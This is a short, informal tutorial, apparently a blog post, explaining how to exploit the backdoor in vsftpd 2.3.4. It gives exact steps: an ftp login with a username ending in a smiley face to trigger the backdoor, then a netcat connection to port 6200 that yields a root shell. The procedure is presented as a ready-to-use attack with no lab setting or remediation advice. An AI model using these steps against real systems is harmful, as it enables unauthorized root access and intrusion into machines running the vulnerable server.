Aside from having a very nice version number (2-3-4), vsftpd 2.3.4 contain a LOLz backdoor that can be exploited easily without using any sophisticated tools (that’s the point of backdoor after all).
What you need:
- A computer with internet connection
- A ftp client (most linux and windows are delivered with one by default)
- Netcat (or something similar, netcat is available for both Linux and Windows)
- Feeling comfortable with terminal and command line
I’ll use a linux machine, but this should work on windows with cmd or powershell as well.
Step 1: Connect to the computer running vsftpd 2.3.4 with your ftp clien
Open your terminal, type the command “ftp <ip address of the target>”
Example: ftp 192.168.123.111
Step 2: Exploit it
The target will as you for user name, don’t worry, just type in some random text ended with a smiley face. They smiley face is important, you must include it into your fake username or it won’t work.
Like this : asdasdasda:)
Then it will as your for a password, just type in some random text.
Like this: dasdasdasd
The terminal will hang because the target has spawned a listener on its port 6200. So, don’t worry. Just leave it like that and don’t close the terminal. All you need to do now is to connect to port 6200 and get your root.
Step 3: Connect to port 6200
In this article I’ll connect to port 6200 using netcat for simplicity shake, but pls feel free to use what you like and feel comfortable with.
Open another terminal (again, don’t close the terminal above), and type in this command: nc <target’s ip> 6200
Example: nc 192.168.123.111 6200
You will see that it will return … nothing. Yes, nothing, the terminal is completely empty. But when you type the command “whoami“, it will return “root“.
Congra, you have sucessufully exploited vsftpd 2.3.4 and get root access (the all-powerfull user of a Linux machine)
Windows also has “whoami” command, so you should be fine even if you’re on Windows.
At first, I thought that I should write this into a python script or something to automate the process. But since the it is so simple, I really can’t bring myself to do that. Also, there is a module in Metasploit framework that can do everything for you.
**Tested on Linux and Windows (with Powershell and Netcat)